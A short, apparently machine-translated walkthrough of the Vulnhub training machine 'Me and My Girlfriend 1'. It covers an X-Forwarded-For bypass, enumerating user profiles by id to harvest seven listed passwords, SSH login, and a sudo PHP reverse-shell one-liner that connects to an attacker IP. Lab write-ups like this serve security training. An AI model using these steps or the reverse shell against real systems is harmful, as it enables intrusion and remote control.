Girlfreind:1 Vulnhub Walkthrough

Others 2020-01-03 11:22:32 views: null

Drone link:

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Host Scan:

 

HTTP directory access, suggesting no authority, right source code, you can prompt XXF

 

Normal access, a user registration, login, and then view user profile, traverse enumerate the user password by id

 

eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty !!!
abdikasepak dorrrrr
sundatea Indonesia
alice 4lic3
pentest pentest

Note login through web, found no upload point

Then try to log in via ssh

 

Mention the right to operate

sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

 

 

OVER !!

Guess you like

Origin www.cnblogs.com/hack404/p/12143701.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com